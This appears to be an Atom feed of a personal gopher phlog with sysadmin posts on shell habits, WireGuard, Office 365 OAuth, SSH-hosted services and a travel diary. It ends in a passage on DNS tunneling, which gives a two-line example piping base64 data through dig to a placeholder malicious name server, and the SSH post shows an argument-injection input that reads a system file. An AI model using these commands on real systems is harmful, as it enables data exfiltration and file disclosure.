I use « make » so often ? Actually no. I use « make » for another
purpose: server configuration. I own multiple servers online, and
configure them with drist [0], which is similar to ansible. To simplify
the configuration deployment, I use a Makefile, so I just need to type
« make » to reconfigure  a server. Everytime I change a config file,
add a DNS name, or username, I run « make » to apply my changes,
which is why I run it so often.

I also build a lot of C programs too, but configuration management is
certainly my main usage these days.

4. cd

There is one thing that frustrate me when I look at other people using
a terminal :

   cd /var
   cd log
   less messages

When people do that, I want to take the keyboard away from them, and
beat them up with it !!
Ok I'm weird. But seriously, I hate monkeying around in my filesystem.
If I want to read the logs, I'll just

   less /var/log/messages

It works, it's elegant, it makes « cd » only appear 4th in you
command history rather than first 😉

5. git

Well, I didn't know I used git that much. It shouldn't surprise me
though, because I constantly search new cool projects to try, and git
clone them.
Another big use I have for git, is updating my port tree, as I run the
crux distro [1], with a lot of git based ports.

6. pwd

I get lost quite often in all these gigabytes !

7. fg (and its friend ^Z)

This is certainly the most idiomatic command of my programming
workflow. I mostly write shell scripts and C programs, which I
test/build manually at the shell prompt. I could use a terminal
multiplexer, but I like having a single place to focus my attention on.
A typical programming session would look like this:

   v file.c   # see command number 1
   ^Z
   make
   [...] outpout omitted
   fg
   ^Z
   make
   ./file
   git add file.c; git commit -m "WOW it works !"
   fg
   man 3 gethostbyname
   ^Z
   fg %1
   ^Z
   fg %2
   ...

I put my editor to the foreground all the time. Even though it has
support for splitting windows, I run it multiple times when editing
multiple files, and play with job ids to call them back. It might sound
slow, but I'm really used to it and feel like I'm pretty efficient. I
must admit that sometimes when I'm tired, I might end up with the same
file opened 3 times in 3 different jobs... This is usually a good sign
that I need some sleep !

8. ssh

What would be life without exploration ?

I use it mostly to administer my servers, or connect to my IRC session,
which is hosted on one of these servers. Nothing fancy here.

9. doas

This is the OpenBSD equivalent to « sudo ». Since I reinstalled all
my servers to OpenBSD, I started using « doas » to administer them (I
never log in as root). I got so used to it, that I started typng «
doas » instead of « sudo » on my own machine. And as crux doesn't
come with « sudo » installed by default, I eventually replaced it
with « doas ». The same phenomena is happening with « rcctl » vs.
« systemctl » on my work laptop. I might add an alias someday !

10. man

To be honest, I'm proud to see it in this list. I love man pages, and
prefer them over stackoverflow answers. With OpenBSD, I learnt to use
them more, and took the habit to read the manual instead of searching
the internet. This helped me a lot when programming in planes or
trains, where you must work offline. I'm proud to finally have a proof
that I RTFM !




What started as a bored question ended up in a good introspection of my
terminal habits. This was a funny exercise, and I would recommend it to
everyone that uses a terminal often.

Now what are YOUR top 10 commands ?
--
~wgs

[0]: gopher://phlog.z3bra.org/0/configuration-management.txt
[1]: https://crux.nu

20201027.2336]]></content>

              </entry>
<entry>

              <title><![CDATA[Official nixers.net gopher space]]></title>

              <id>gopher://phlog.z3bra.org/0/official-nixers.net-gopher-space.txt</id>

              <link href="gopher://phlog.z3bra.org/0/official-nixers.net-gopher-space.txt" />

              <updated>2020-09-17T15:59:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                     Official nixers.net gopher space
──────────────────────────────────────────────────────────────────────

I recently came back into the gopherspace, and wanted to bring more
people
with me this time, so I have other people to discuss that with. To
achieve
that, I built a new server (xaero.z3bra.org) to host a gopherspace for
the
nixers.net community.

I hope we'll also see cool contributions to the gopherspace from the
members, as a bunch of people were curious about gopher, without knowing
how to get started with it.

The gopher hole is accessible here:

   gopher://g.nixers.net

If you want an account, feel free to contact me, and perhaps join the
nixers.net forums [0], you'll be welcome !

=====

This is the second time I build a multi-user machine, so I'm still
learning how to configure a host that might be accessed by "strangers".

This community is small, so I doubt I'll encounter any hostile behavior
from the users. However, I'd still like to learn how to properly
configure
those remote access, and limit their resources. Guess I'll have to read
that scary login.conf(5) after all…

I hope I'll manage to keep the system clean, and under control. It's
currently managed with drist(1) (thanks again, solene !). But I'd like
to
make it more like a gateway were people can connect to access more
stuff,
like the yggdrasil or dn42 network. I'll see what people are interested
in.

Wish me luck !
--
~wgs

[0]: https://nixers.net

20200917.1559]]></content>

              </entry>
<entry>

              <title><![CDATA[Old Computer Challenge V3]]></title>

              <id>gopher://phlog.z3bra.org/0/old-computer-challenge-v3.txt</id>

              <link href="gopher://phlog.z3bra.org/0/old-computer-challenge-v3.txt" />

              <updated>2023-07-18T22:07:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                            Old Computer Challenge V3
──────────────────────────────────────────────────────────────────────
> gopher://occ.deadnet.se/1/users

Day 0
=====
I only learn about the challenge on the first day. Hopefully I have the
perfect challenger for this task: my trusty Acer Aspire One from 2009.
Equipped with an Intel Atom clocking at 1.6GHz, 1Gib of RAM and a 250Gb
hard drive, it barely needed any limitation to fit in the challenge.

I grab it from the shelf, blow the dust out of it and powers it.
Without much surprise, it boots into the 5 years old Void Linux I had
setup and forgot about.

I plug it in to reflow it with some juice, and ends the day.

Day 1
=====
I decide to finally install OpenBSD on this thing, and to make it work.
Years ago I had issues with the WiFi card not being usable, but it
should be fixed now right?

Obviously not.

After failing at using urndis(4) to use my phone's connection over USB,
I eventually found a working WiFi card in an Asus Eee PC from the same
era.

It took me quite some time and patience, but I got OpenBSD up and
running, with an internet access that's reliable!

The rest of the day will be spent setting up my environment, which
features many software that must be compiled, either to configure them,
or because they're not packaged:

- abduco      0.6
- dmenu       5.2
- glazier     1.1
- human       0.3
- lel         0.2
- libwm       1.3
- pm          1.4
- randr       0.0
- sacc        1.06
- webdump     0.0
- wmutils     1.7
- xmenu       0.0
- xrectsel    0.3.2
- xscreenshot 0.0
- xwait       5.7

And that's where I hit my first OCC limit: with a single core at 1GHz,
everything is slow when you're compiling stuff in the background!
Hopefully these software compile rather fast, so I just had to wait a
few seconds before using the computer again.

With the environment setup, it was time to actually use the computer.
So I decided to brag about it on the web. I knew for a fact that
firefox cannot run on this machine, even at its full potential, because
I tried it already, and failed miserably. So I installed netsurf right
away as my gateway to the world wide web.

And here is the second limit: It turns out that netsurf doesn't start
with Javascript enabled. 512Mib of RAM just isn't enough for it
apparently, so I disabled that. I could browse few website and access
online resources I need to fix issues I had with the configuration of
OpenBSD, but that's pretty much it. The web of today requires
javascript to interact with it.

I close the notebook on this unsurprising fact.

Day 2
=====
Unfortunately, this would be my last day for the challenge. I would be
on holidays the next day, with no plan to do any computing. This would
also be a very short day, as my workday turned out to be very busy.

I simply spent the night chatting on IRC from this cool little notebook
I have, happy that I revived it once again for no valid reason :)


Closing word
============

I cannot consider this challenge a success. I came in to late, and
could only use the notebook for 2 days, not doing anything meaningful.

I'm however happy to finally have been able to slap OpenBSD on it, and
I'll definitely keep using this thing when I'm on the go, as the form
factor is simply too practical! The battery is also surprisingly good
for a cheap computer of the past decade.

I'll definitely use it again for next year's challenge ;)


Bonus
=====

Pictures of "sorlag":

gopher://z3bra.org/I/u/sorlag-outside.jpg
gopher://z3bra.org/I/u/sorlag-inside.png


20230718.2207]]></content>

              </entry>
<entry>

              <title><![CDATA[Online messaging]]></title>

              <id>gopher://phlog.z3bra.org/0/online-messaging.txt</id>

              <link href="gopher://phlog.z3bra.org/0/online-messaging.txt" />

              <updated>2020-08-25T08:43:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                     Online messaging
──────────────────────────────────────────────────────────────────────

An XKCD comic is worth a thousand words.

https://imgs.xkcd.com/comics/standards.png

There is no standard when it comes to online communication.

IRC used to be the way people communicate online. This is not true
anymore however, and with all the new protocols, platforms, applications
that pop out every now and then, communication is easier than ever !

Easier ? Not so much.

To communicate with 3 different groups of people, you need 3 different
applications. Be it Facebook Messenger, Telegram, Whatsapp, Matrix,
Mattermost, Discord, …, you name it.

Each require creating an account, turning on notifications, learning
the UI and so on, and so forth.

Of course, none of these could agree on a standard way to relay text
messages from one device to another! So now this is your problem, as
a user, to sort out the problem of switching contexts.

But maybe you don't have to…

# Matterbridge

By relaying messages from one platform the others, [matterbridge][0] is
the kind of project that provide an elegant solution to an ugly problem.

It creates a bridge between many of the existing messaging platforms,
and bridge them together. When a message is received on one platform,
the matterbridge gateway will replay this message to all the other
platforms configured, so people can effectively talk to each other in
a cross-application manner.

I use it so I can participate in a local group in my hometown on WhatsApp,
which I don't want installed on my personnal phone. It relays all
messages on IRC, and to a telegram group, so I can still participate
from my phone.

# Whatsapp

In order to use whatsapp with matterbridge, you need an account (so a
phone number), and find a way to "authorize" matterbridge to use this
account.

The only way to do it (at least for matterbridge v1.18.0), is by tricking
whatsapp into thinking that matterbridge is a web browser, so it can
use the whatsapp [web version][1].
The web version doesn't replace the original application, so you got to
keep it running all the time.

As I didn't want whatsapp to run on my phone, I had to find another way.

# Android VM

The android SDK provide an emulator, that you can run in headless mode.
What's happening under the hood is that you get a qemu virtual machine
started for your phone's architecture (even x86_64!).

The procedure to get whatsapp running on a VM is described here:

https://github.com/tulir/mautrix-whatsapp/wiki/Android-VM-Setup

This includes feeding the phone's webcam with ffmpeg recording your
desktop, so you can scan the QR code created by matterbridge from
whatsapp, and allow it to run (you MUST run it in graphical mode at this
point, so a working android SDK is needed).

Unforturnately, the emulator will only run on Linux, so I couldn't host
it on one of my OpenBSD server. To make it simpler, I chose to install
a Debian 10, so the SDK installation is easy to do.

       apt install android-sdk libopengl0 libxdamage1 libtinfo5 libgl1 libegl1-mesa
       curl -O https://dl.google.com/android/repository/commandlinetools-linux-6609375_latest.zip
       unzip -d /usr/lib/android-sdk commandlinetools-linux-6609375_latest.zip
       /usr/lib/android-sdk/tools/bin/sdkmanager 'system-images;android-30;google_apis_playstore;x86_64' emulator
       /usr/lib/android-sdk/tools/bin/sdkmanager --update

You'll need that on both your server and local machine. Then you can
create the android emulator locally, and start it:

       /usr/lib/android-sdk/tools/bin/avdmanager create avd -n whatsapp -k 'system-images;android-30;google_apis_playstore;x86_64'
       /usr/lib/android-sdk/emulator/emulator -avd whatsapp

Once running, install the whatsapp application, connect it to your
account and make sure it works. Follow the guide I mentionned earlier
to link it to matterbridge.
Don't forget to authorize the ADB key fingerprint at boot, so you can
later connect to the emulator from the command line.

Once done, take a snapshot of the emulator, and shut it down. Your full
emulator state should be saved to ~/.android/avd, and the adbkey to
~/.android/adbkey

Upload the whole ~/.android to your server, and start the emulator in
headless mode:

       /usr/lib/android-sdk/emulator/emulator -avd whatsapp -no-audio -no-window

After some time you should be able to connect to it using `adb shell`. Use
this connection to start the application (and eventually, enable the
wifi card, if you don't have internet access on the emulator):

       adb shell 'svc wifi enable'
       adb shell 'ping web.whatsapp.com'
       adb shell 'am start -n com.whatsapp/.HomeActivity'

At this point, the VM should be up and running, and whatsapp started,
and in the foreground ! You can verify it by taking a screenshot:

       adb shell 'screencap -p' > capture.png

In case you want to click on the touchscreen remotely, you can use

       adb shell 'input X Y'

Where X and Y are the coordinates of where you want to click. Not very
comfortable to use, but that might be handier than stopping the VM and
starting it again locally, snapshot it, reupload, …

# Rationale

https://imgs.xkcd.com/comics/team_chat.png

[0]: https://github.com/42wim/matterbridge
[1]: https://web.whatsapp.com

20200825.0843]]></content>

              </entry>
<entry>

              <title><![CDATA[partage: An HTTP based file sharing system]]></title>

              <id>gopher://phlog.z3bra.org/0/partage-an-http-based-file-sharing-system.txt</id>

              <link href="gopher://phlog.z3bra.org/0/partage-an-http-based-file-sharing-system.txt" />

              <updated>2021-10-21T14:34:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                           partage: An HTTP based file sharing system
──────────────────────────────────────────────────────────────────────
In the past weeks, I had to share files with a company that didn't fit
in an email. We're reaching 2022, yet sharing big files anonymously
remains a pain in the ass…

So I started looking around for self-hosted solutions, and it turns out
there are quite a few [0] !
My need was a simple solution that runs on OpenBSD, and that I could
link to my family and friends so they can share stuff with me. It must
be fairly straightforward to use, with sane default and a low barrier
of entry.
I first settled on linx-server [1]. It works well without javascript,
is fairly simple to install and can interact with httpd(8) over fastcgi!

The only thing I missed was the ability to chroot and run with
restricted privileges, so I decided to hack those features in. I never
really wrote any Go before, but I quickly realized how rich the
standard library is! Reading and understanding the code felt familiar
coming from C. I quickly added the features I needed, and setup my
server.

I kept reading the code by curiosity, and that's when my NIH syndrom
triggered…

A few days later, partage [2] was born!

Partage is a simple HTTP server that accept uploads over PUT and POST
requests, and store files under randomized names. Each file is set to
expire after a defined amount of time, and an external tool
(partage-trash(1)) can be used to "collect" expired files (usually in a
cronjob).

A nice looking landing page is provided by default (with minimal CSS
and Javascript) for marketing purposes, but the server can totally work
without a front-end.

Overall, writing this software was very cool! I'm truly amazed at how
simple to use Go is, and how similar to C it feels. The standard
libraries are complete, and cross-compiling is a breeze. I'll
definitely consider it again for future projects!
--
~wgs

[0]: https://github.com/awesome-selfhosted/awesome-selfhosted
[1]: https://github.com/ZizzyDizzyMC/linx-server
[2]: gopher://z3bra.org/0/projects/partage.txt

20211021.1434]]></content>

              </entry>
<entry>

              <title><![CDATA[Re: Gopher text rendering ideas]]></title>

              <id>gopher://phlog.z3bra.org/0/re-gopher-text-rendering-ideas.txt</id>

              <link href="gopher://phlog.z3bra.org/0/re-gopher-text-rendering-ideas.txt" />

              <updated>2020-09-25T16:40:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                      Re: Gopher text rendering ideas
──────────────────────────────────────────────────────────────────────

So I gave it a quick try using my gopher web proxy. It worked as such:

0. Read the whole text file in memory
1. Search for "\n\n", mark it as end of paragraph
2. Search for "   " (3 spaces) inside that paragraph
3.0 No occurence ? Wrap paragraph in <p> tags
3.1 Matched ? Wrap paragraph in <pre> tags
4. Move pointer past the paragraph
5. Start over till EOF

It worked great overall ! I browsed a few holes like this, and all
ASCII arts / code snippets rendered perfectly. Actual text paragraphs
were also pleasant to read with proportional fonts.

However,

A few things I didn't think about looked odd, because the <p> tag
reflow text by default. Things like lists, or quoted text looked bad:

1. First item 2. Second item 3. Third item

> This was a quoted text with > hard wraps in it, that should
definitely > not be reflowed.

Some texts or graphic stuff looked odd as well, like banners like this
that are 70 char wide:

||<><><><><><><....>||

As a conclusion, I think that my « naive » approach was a bit too
naive, so for now I reverted to full monospace font for the time being,
until I find a better way to do it, or give up on it entirely.

If someone has an idea, feel free to contact me to discuss it !
--
~wgs
20200925.1640]]></content>

              </entry>
<entry>

              <title><![CDATA[Reflowing emails with fmt(1)]]></title>

              <id>gopher://phlog.z3bra.org/0/reflowing-emails-with-fmt1.txt</id>

              <link href="gopher://phlog.z3bra.org/0/reflowing-emails-with-fmt1.txt" />

              <updated>2020-09-09T14:42:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                         Reflowing emails with fmt(1)
──────────────────────────────────────────────────────────────────────
scribo(1) can now filter the message body through a command rather
than writing directly to the file. The advantage to this is that I
can reformat the mails with, eg. fmt(1), or even turn markdown to
HTML, or trim HTML tags. So many possibilities !

This fixes the issue I have when sending mails from my phone which
doesn't wrap text at a given column number. This way I can type
however I want and rest assured that my entry will be nicely
rendered !

EDIT: actually it looks nicer when reflowing with fold(1), as it
won't refill lines.
--
~wgs

20200909.1442]]></content>

              </entry>
<entry>

              <title><![CDATA[Replacing tinc with wireguard]]></title>

              <id>gopher://phlog.z3bra.org/0/replacing-tinc-with-wireguard.txt</id>

              <link href="gopher://phlog.z3bra.org/0/replacing-tinc-with-wireguard.txt" />

              <updated>2021-09-28T18:04:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                        Replacing tinc with wireguard
──────────────────────────────────────────────────────────────────────
After a few months of heavy procrastination, I finally replaced my old
tinc[0] mesh VPN with wireguard[1].

Since version 6.8, OpenBSD now ships with the wg(4) driver by default,
providing ifconfig(8) with all the tools required to setup a wireguard
VPN.
You don't even need the (in)famous wireguard-tools package !

Generating the private key is done with openssl(1):

   openssl rand -base64 32
   y4mJJGiPwpZIauJlZuDSY0f+Dqx8UPD9WGD0fQvzkK4=

You can then put it in the /etc/hostname.wg0, along with your peers
public keys:

# /etc/hostname.wg0
inet 10.0.0.1 255.255.255.240
wgport 51820 wgkey y4mJJGiPwpZIauJlZuDSY0f+Dqx8UPD9WGD0fQvzkK4=
wgpeer FbRKfD8E6D/6xIHJqpigq0I6DYe63pF/ak1FArQXoDA= wgendpoint peer1.domain.tld 51820 wgaip 10.0.0.2
wgpeer z6sXdKvJAYnjqL2pTUoG8U+mzj19lcgUdfHXV8pLAkQ= wgendpoint peer2.domain.tld 51820 wgaip 10.0.0.3
up

The public key is printed along with the other interface attributes,
under the name "wgpubkey". Use ifconfig(8) to get it:

   doas ifconfig wg0 | grep wgpubkey

So far it does the job just as well as tinc, but as it's built into the
kernel, no external tool/daemon is required, which is really nice.

I also managed to automate the whole setup (generate priv keys,
distribute public ones) thanks to drist(1).

keep hacking!
--
~wgs

[0]: https://tinc-vpn.org
[1]: https://wireguard.com

20210928.1804]]></content>

              </entry>
<entry>

              <title><![CDATA[RIP M$ basic auth support 💀]]></title>

              <id>gopher://phlog.z3bra.org/0/rip-microsoft-basic-auth-support.txt</id>

              <link href="gopher://phlog.z3bra.org/0/rip-microsoft-basic-auth-support.txt" />

              <updated>2022-10-25T18:59:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                 RIP M$ basic auth support 💀
──────────────────────────────────────────────────────────────────────
Microsoft must hate their users.

I've seen the news come up a few time, thinking that would be nothing
but a joke. But here we are: Basic authentication for microsoft exchange
is dead 💀.

This means that the only way to authenticate to your office 365 mail
box is using the XOAuth2 mechanism. And hear me out, it's a pain!

However, I'm not writing this post as yet another rant against
microsoft. It is a brain dump of what I did to get it working again,
because I'll need it sooner of later (and you'll probably need that
too!).

# Process

This will let you retrieve/send email with isync/msmtp respectively. At
the end of the day, you'll still use a username/password, it's just that
getting that "password" (XOAUTH2 token) is a pain in the neck.

0. Get a stress ball, put it somewhere close to you
1. Login to https://portal.azure.com with your email account
2. Navigate to the "App Registration" page (use the searchbar)
3. Register a new "app"
       3.0 Name it "blebleble" (this is important)
       3.1 Select "Single tenant" access
4. Authentication
       4.0 Add platform: Mobile + Desktop
       4.1 Set redirect URI: http://localhost
       4.2 Advanced settings Allow public client flow: YES
5. API Permissions
       5.0 Microsoft Graph: (allow them all, really…)
               - email
               - offline_access
               - IMAP.AccessAsUser.All
               - POP.AccessAsUser.All
               - SMTP.Send
               - User.Read
6. Overview: copy "client" and "tenant" ID
7. Download xoauth2.py[0] (modified by me, thank you sir Perlis!)
8. Replace TENANT_ID and CLIENT_ID in the source with your own
       8.1 (Optional) edit ENCRYPTION_PIPE/DECRYPTION_PIPE
           This currently use cat(1). Use a decent crypto tool if you
           care, like cream[1] or age
9. xoauth2 ~/.cache/o365.token -a
       9.0 OAuth2 registration: microsoft
       9.1 OAuth2 flow: localhostauthcode
       9.2 Account email address: [email protected]
       9.3 Navigate the link
       9.4 Accept permissions

VOILÀ! 😫🔫

You should now be authorized to read your emails.

Use the command `xoauth2 ~/.cache/o365.token` to get your current access
token, and use it as your password. Here is my own ~/.mbsyncrc for
reference:

       IMAPAccount o365
               Host outlook.office365.com
               Port 993
               User [email protected]
               PassCmd "xoauth2 ~/.cache/o365.token"
               SSLType IMAPS
               SSLVersions TLSv1.2 TLSv1.3
               AuthMech XOAUTH2

Notes: For mbsync, you'll need to install the Cyrus sasl2-xoauth2 module

       The xoauth2 token is stored unencrypted on disk. Look for
       ENCRYPTION_PIPE and DECRYPTION_PIPE in xoauth2.py to handle
       encryption is you care (current encryption tool: cat(1)).
--
~wgs

[0]: gopher://z3bra.org/0/notes/xoauth2.py
[1]: gopher://z3bra.org/0/projects/cream.txt

20221025.1859]]></content>

              </entry>
<entry>

              <title><![CDATA[SSH as a public service]]></title>

              <id>gopher://phlog.z3bra.org/0/ssh-as-a-public-service.txt</id>

              <link href="gopher://phlog.z3bra.org/0/ssh-as-a-public-service.txt" />

              <updated>2022-08-23T17:26:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                              SSH as a public service
──────────────────────────────────────────────────────────────────────
As the HTTP protocol becomes more and more ubiquitous for online
services,
I've looked into other protocols that could expose services online.

It turns out that ssh is a perfect candidate for that !
I've seen a couple examples in the wild, and there might be more:

       ssh [email protected]
       ssh [email protected]

So I decided to look into it myself, and set it up on my OpenBSD server.


0. Service program
------------------

First, you'll need a program to provide your service. We'll make a
program that gives the current day.

       # cat <<EOF > /usr/local/bin/today.sh
       #!/bin/sh
       date '+%A !'
       EOF
       # chmod +x /usr/local/bin/today.sh
       # /usr/local/bin/today.sh
       Tuesday !

You'll probably want something more useful, and we'll get to it later
on. For now, this will be enough.


1. Service account
------------------

It all starts with an account, that you'll use to connect to the
machine, and run the program. This account must not have a password,
and have restricted rights to the system resources.

So let's first create a login class for these users, to limit its
resource usage on the system:

       # cat <<EOF > /etc/login.conf.d/sshervice
       sshervice:\
               :path=/bin /usr/bin /usr/local/bin:\
               :umask=022:\
               :datasize=1024M:\
               :maxproc=32:\
               :openfiles=128:\
               :stacksize=1M:\
               :filesize=512M:
       EOF
       # cap_mkdb /etc/login.conf

See login.conf(5) for how to tweak these values to your likings.

       # groupadd _sshervice
       # adduser -d /var/sshervice \
               -L sshervice \
               -g _sshervice \
               -s /bin/sh \
               -p '' \
               today

At this point, you should be able to get a shell for your service
account without specifying a password (try as non-root user):

       $ su - today
       $ /usr/bin/whoami
       today
       $ pwd
       /var/sshervice


2. SSH access
-------------

You can login as this user, but it shouldn't be accessible from the
outside, because of how unsecure it is (at least that's the case on
OpenBSD).

Thanks to the "Match" keyword, OpenSSH can apply specific configuration
bits to a user or a group (see sshd_config(5) for details). So we'll
use that:

       # cat <<EOF > /etc/ssh/sshd_config_sshervice
       Match User today
               ForceCommand /usr/local/bin/today.sh

       Match Group _sshervice
               PasswordAuthentication yes
               PermitEmptyPasswords yes
               DisableForwarding yes
               ForceCommand /sbin/nologin
               MaxSessions 5
       EOF
       # echo 'Include sshd_config_sshervice' >>/etc/ssh/sshd_config
       # rcctl restart sshd


3. Final result
---------------

       $ ssh [email protected]
       Tuesday !


4. Going further
----------------

From there, it's all a matter of providing cool and/or useful services,
so you'll have to improve what's running as the "ForceCommand" of your
user.

Here are a few tips, in no particular order:

---

Read login.conf(5) and sshd_config(5). Really, do it.

---

Remember that you're giving strangers the ability to run programs on
your server. Take extra care to not provide them the ability to get
access to a shell. For example:

       #!/bin/sh
       date "$1"

This looks harmless, but passing it "-f/dev/passwd" would yield its
full content. So take extra care with the commands you allow !

---

Worth mentionning is that you can chroot(8) your service over ssh with
the following line under the "Match" block of sshd_config(5):

       ChrootDirectory /var/sshervice

This require to setup a proper chroot for your service to run the
program correctly.

---

Never trust user input.

---

use environment variable `$SSH_ORIGINAL_COMMAND` to allow users to
specify commands. Given the following script:

       #!/bin/sh
       date -- "+${SSH_ORIGINAL_COMMAND:-%A !}"

You can now specify the date format on the command line:

       $ ssh [email protected]
       Tuesday !
       $ ssh [email protected] %Y-%m-%d
       2022-08-23

---

Prefer self-contained programs over scripts.
Ideally statically link and chroot them.

---

If your program requires a TTY to run (like a pager for example), don't
forget to pass `-t` when you specify a command over ssh, because it does
not allocate a pseudo tty by default when passing arguments.

Imagine an online man page service:

       #!/bin/sh
       man "${SSH_ORIGINAL_COMMAND:-man}"

Make sure to add -t to force a pseudo TTY allocation for the pager to
work:

       $ ssh -t [email protected] sshd_config

20220823.1726]]></content>

              </entry>
<entry>

              <title><![CDATA[The gophirst approach]]></title>

              <id>gopher://phlog.z3bra.org/0/the-gophirst-approach.txt</id>

              <link href="gopher://phlog.z3bra.org/0/the-gophirst-approach.txt" />

              <updated>2020-09-13T16:47:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                The gophirst approach
──────────────────────────────────────────────────────────────────────

Plain text makes things easier.

That's why I like gopher more and more, and want to make gopher my main
way to publish content on the internet.
However, I am not ready to completely abandon the web. I still want
eveeything to be accessible online by people using the inferior HTTP
protocol.

That's from this idea that I started phroxy [0], an inetd(8) http to
gopher proxy.  You can clone the project over git:

   git clone git://z3bra.org/phroxy.git

It is far from ready, but can already serve text files !

The goal will be to ressemble something like what's running at
proxy.vulpes.one [1]. As I could not find the code for it, I decided to
write my own.

Using floodgap's gatewqy is not really an option I consider, as they
lack UTF-8 support. That's per the RFC1436, but I believe that gopher
content is better served as UTF-8 than US-ASCII.
--
~wgs

[0]: gopher://z3bra.org/scm/phroxy
[1]: https://proxy.vulpes.one
20200913.1647]]></content>

              </entry>
<entry>

              <title><![CDATA[TLS-sending guarantee @posteo.de]]></title>

              <id>gopher://phlog.z3bra.org/0/tls-sending-guarantee-posteo.de.txt</id>

              <link href="gopher://phlog.z3bra.org/0/tls-sending-guarantee-posteo.de.txt" />

              <updated>2020-10-20T20:31:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                     TLS-sending guarantee @posteo.de
──────────────────────────────────────────────────────────────────────
Today, an internet fellow reported to me a strange issue he had when
sending me emails from his @posteo.de address. The mail bounced with
the following error:

“ TLS is required, but was not offered by host „

What ? I run opensmtpd, whose configuration includes the following
line:

    listen on egress tls pki lucy.z3bra.org

This makes the server listen on port 25, and accept securing the
connection with the STARTTLS command. A quick telnet demonstrates that
it works as expected:

    220 lucy.z3bra.org ESMTP OpenSMTPD
    HELO sweetie
    250 lucy.z3bra.org Hello sweetie [redacted], pleased to meet you
    STARTTLS
    220 2.0.0 Ready to start TLS

So what is posteo really complaining about ?

After searching a bit, I found that they have an option called «
TLS-sending guarantee », (off by default). See their article on
TLS-sending guarantee for further details [0]:

“ As standard, before sending each email, Posteo attempts to create
an encrypted connection with other email servers. If the TLS-sending
guarantee is activated for your account, we will only send your email
if it can be securely delivered to the recipient. „

My guess is that TLS is checked by connecting to port 465 first, and
consider it « unsafe » if connection is refused. It is probable that
checking STARTTLS is costly in terms of resources, because it means
restarting an already established connection.

Of course, opensmtpd supports that, and the configuration was
*extremely* easy:

    listen on egress smtps pki lucy.z3bra.org

You learn something new everyday !
--
~wgs

[0]: https://posteo.de/en/help/activating-tls-sending-guarantee

20201020.2031]]></content>

              </entry>
<entry>

              <title><![CDATA[Trip to Reunion Island]]></title>

              <id>gopher://phlog.z3bra.org/0/trip-to-reunion-island.txt</id>

              <link href="gopher://phlog.z3bra.org/0/trip-to-reunion-island.txt" />

              <updated>2020-10-14T19:34:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                               Trip to Reunion Island
──────────────────────────────────────────────────────────────────────

The Reunion Island is a marvelous place, full of magnificent mountains,
wonderful lagoons and delicious people.

We went there with my girlfriend for the past two weeks, hiking and
diving all around the island. It is a volcanic island whose volcano is
one of the most active on earth.

# Salazie caldeira

This is the first caldeira we went to, directly after landing, and we
visited the nice little village of Hell-bourg. The next day we went to
the « Trou de fer » by the Bélouve forest. The view point there is
impressive !

# Mafate caldeira

The next day, we went to Marla, a village in the Mafate caldeira. We
walked there because these caldeira is only accessible by foot, or
helicopter. The hike is beautiful, however we had fog during the
morning so we couldn't see much of the panorama. ! Marla is pretty
small, and most people living here are renting rooms to hikers. There
is a school however (with 10 kids !), and a snack, « chez Jimmy »
which sells ti punches to everyone passing by !

# East coast, or « windy coast »

There is not much to see here in my opinion, besides the vanilla
cooperative. There is way more to see in the south !

# South - The lava road

The main thing to see in the south is of course the lava road, which
crosses the old lava flows, that reach the ocean. Their size is
impressive and all those rocky lava floors make for a desolated view.

# South - Everything else

This region is beautiful. The weather is much nicer, and there are a
lot of "lava beach" and other funny stuff to see. There are also many
water falls cause by erosion.

# West coast, the lagoons

The  lagoons are the only safe places for a bath in the ocean, because
of shark presence around the island. There is a natural coral barrier,
which makes the lagoon a safe place for snorkeling. You really get to
see fishes of various sizes, shapes and  colours. It was incredible to
see that much fishes !

# Cilaos caldeira

I got to experience alpinism for the very first time, and it was
incredible ! We climhed the famous « 3 Salazes », right between the
Mafate and Cilaos caldeiras. The view was beautiful on both side, and
impressive too, as sometimes I was walking on traces barely 20cm wide !

Other than that, Cilaos is the third caldeira of the island, and it is
known for their lentils, so we definitely had to eat some !

# Last word

Reunion Island is a really nice place. I loved how you can switch from
the mountains to the lagoon in less than an hour. The food was also
pretty good (especially the « Rougail saucisse » !). I hope I'll get
to go back there someday !!

Oh and btw, here is a quick montage of a few pics I took there:

gopher://z3bra.org/I/u/reunion-2020.png

--
~wgs
20201014.1934]]></content>

              </entry>
<entry>

              <title><![CDATA[Using DNS to bypass hotspot WiFi]]></title>

              <id>gopher://phlog.z3bra.org/0/using-dns-to-bypass-hotspot-wifi.txt</id>

              <link href="gopher://phlog.z3bra.org/0/using-dns-to-bypass-hotspot-wifi.txt" />

              <updated>2020-09-26T13:42:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                     Using DNS to bypass hotspot WiFi
──────────────────────────────────────────────────────────────────────

I took the plane yesterday, and realized that some companies now «
offer » a free wifi service on-board, so you can access the internet
while flying. They don't really offer anything though, as you must
register your email address on a captive portal, and even pay a fee to
get full internet access (instead of just « messaging apps »).

I tried to access the internet using curl(1) directly, to see if you
could use protocols like gopher, or even smtp without registering.
Turns out you can't.
However, I noticed that I could resolve all the hostnames I wanted !
Which means DNS request reach the internet without needing you to
register on the portal. It immediately reminded me a technique I read
about in the past, and forgot: DNS tunneling.

DNS tunneling is usually used as a data exfiltration method in cybrr
attack. It assumes DNS traffic goes to the internet unfiltered, so a
malware can use DNS queries to export data to an external server. For
example:

   pl=$(echo "hidden data" | base64)
   dig +short TXT $pl @gimmedata.ns1.malicious.tld

The data can then be retrieved from the logs, or a modified DNS server
could even reconstruct it. This is bad though, and you shouldn't do it.

However, abusing the DNS payload to send data over the internet is an
interesting idea. Instead of exfiltrating data, you could use the
remote DNS as a proxy or VPN, and access the clearnet by wrapping all
your outgoing traffic in DNS queries, that would be replayed by the
